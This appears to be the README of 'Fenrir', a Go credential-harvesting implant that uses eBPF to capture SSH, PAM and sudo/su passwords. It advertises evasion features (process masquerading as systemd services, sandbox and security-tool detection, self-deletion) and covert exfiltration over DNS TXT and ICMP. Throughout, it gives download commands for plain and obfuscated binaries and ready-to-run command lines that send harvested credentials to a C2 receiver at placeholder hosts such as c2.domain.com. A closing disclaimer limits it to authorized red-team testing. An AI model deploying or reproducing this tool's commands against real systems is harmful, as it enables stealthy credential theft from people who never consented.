A golang-written credential harvesting framework leveraging eBPF for kernel-level monitoring with anti-detection capabilities.
- Memory-only operation: Runs entirely from RAM with no disk persistence
- Automatic cleanup: Process memory cleared on termination
- Runtime unlinking: Removes binary from filesystem while executing
- Zero forensic traces: No logs, temporary files, or disk artifacts
- Custom process naming: Masquerade as legitimate system processes
- PID management: Advanced process tree manipulation
- Runtime attribute modification: Dynamic process camouflage
- Parent process spoofing: Blend into expected process hierarchies
- Preflight security scanning: Detects 25+ security tools before execution
- Continuous environment monitoring: Real-time sandbox and VM detection
- Anti-forensics measures: Counters memory analysis and debugging
- Watchdog termination: Auto-destruct on hostile environment detection
- Encrypted communications: AES-256 encrypted data channels by default
- Covert exfiltration: DNS TXT and ICMP echo data embedding
- Multi-layer obfuscation: String encryption and control flow obfuscation
- Minimal network footprint: Blends with normal DNS/ICMP traffic
- SSH interception: Real-time capture of SSH password authentication
- PAM monitoring: Hooks into system authentication modules via uprobe
- File-based discovery: SSH keys, configuration files, credential stores
- sudo/su capture: Privilege escalation credential harvesting
- DNS TXT records: Embeds credential data in seemingly legitimate DNS queries
- ICMP echo tunneling: Hides data in ping packet payloads
- Encrypted transport: End-to-end encryption with custom key derivation
- Traffic mimicry: Patterns indistinguishable from normal network activity
- Command & Control: Full-featured C2 infrastructure (
fenrir-channel) - Web dashboard: Real-time credential management interface
Download pre-built binaries from Releases:
# Download latest release (Linux x86_64)
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/fenrir-linux-amd64
chmod +x fenrir-linux-amd64
# Download C2 receiver
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/fenrir-channel-linux-amd64
chmod +x fenrir-channel-linux-amd64
# Verify checksum (recommended)
wget https://github.com/tahaafarooq/fenrir/releases/latest/download/checksums.txt
sha256sum -c checksums.txtAvailable builds:
fenrir-linux-amd64- Standard Linux x86_64 buildfenrir-linux-amd64-garbled- Obfuscated buildfenrir-linux-arm64- Linux ARM64 buildfenrir-channel-linux-* - C2 receiver for respective architectures
# Memory-only execution with encrypted exfiltration
sudo ./fenrir -volatile -key "op-2024-winter" -dns c2.domain.com -q
# Custom process name + multiple channels
sudo ./fenrir -name "systemd-resolved" -volatile -dns c2.example.com -echo target.domain.com -key "mission-key" -pam -fmon
# Persistent background operation
sudo ./fenrir -d -volatile -key "persistent-key" -dns c2.domain.com -watchdog -preflight# C2 receiver with web dashboard
./fenrir-channel -dns c2.domain.com -key "op-2024-winter" -web :8443 -log /tmp/harvest.log
# Multi-channel receiver with ICMP
./fenrir-channel -dns c2.domain.com -icmp -key "mission-key" -web 127.0.0.1:8443# View harvested credentials
fenrir decrypt -key "op-2024-winter" /tmp/harvest.enc
# Check agent status
fenrir status
# Clean termination
fenrir stopListing Commands with -h / -help flag
$ sudo ./fenrir -d -pam -volatile -key "testkey" -o /tmp/fenrir.txt -qThe command above will execute fenrir on memory and daemonize it to run on background, you can also delete the binary it'll keep on running until the host has been rebooted or the process has been identified and killed, the logs will be encrypted with the key provided and saved into the file /tmp/fenrir.txt, which can later then be decrypted with the commands:
$ sudo ./fenrir decrypt -key "testkey" /tmp/fenrir.txtThe process can be identified with
sudo ps aufx | grep 'fenrir'
$ sudo ./fenrir -d -pam -volatile -name "systemd-journald" -key "testkey" -o /tmp/fenrir.txt -q -watchdog -preflightOn the server with fenrir:
sudo ./fenrir -d -pam -volatile -name "systemd-journald" -key "testkey" -echo c2.domain.com -o /tmp/fenrir.txt -qOn C2:
./fenrir-channel -key "testkey" -icmp -web :8443 -qFenrir leverages eBPF (extended Berkeley Packet Filter) for kernel-level monitoring without traditional rootkit signatures:
- Ring buffer events: High-performance kernel -> userspace data transfer
- Syscall tracing: Monitors
read(),write(),openat()without ptrace overhead - Multi-source correlation: Aggregates data from SSH, PAM, and file monitoring
- Zero kernel modifications: Uses in-tree eBPF capabilities only
- VM detection: VMware, VirtualBox, QEMU, KVM, Xen identification
- Container awareness: Docker, LXC, Kubernetes pod detection
- Sandbox evasion: Cuckoo, Joe Sandbox, hybrid analysis environments
- Security tool detection: 25+ tools including Wireshark, Sysdig, Falco, Tetragon
- Linux kernel: 5.4+ (eBPF CO-RE support required)
- Privileges: Root access for eBPF program loading
- Architecture: x86_64, ARM64 supported
- Dependencies: Minimal, uses only in-tree kernel features
AUTHORIZED TESTING ONLY: Fenrir is designed exclusively for legitimate security testing, penetration testing, and red team exercises with explicit authorization. Users are solely responsible for ensuring legal compliance.
Educational Purpose: This tool serves security research and educational objectives. Any malicious use is strictly prohibited and not supported.
No Warranty: Provided "as-is" under GPL v3. See LICENSE for full terms.
We welcome contributions from security researchers and developers:
git clone https://github.com/tahaafarooq/fenrir.git
cd fenrir
# Install dependencies (Linux/WSL2 required)
make headers # Fetches eBPF headers
make generate # Generates eBPF bytecode
make build # Compiles fenrir binary
# Build C2 receiver
make channel- Issues: GitHub Issues
- License: GPL v3 - see LICENSE
If Fenrir has been helpful for your security research or penetration testing, consider supporting its development: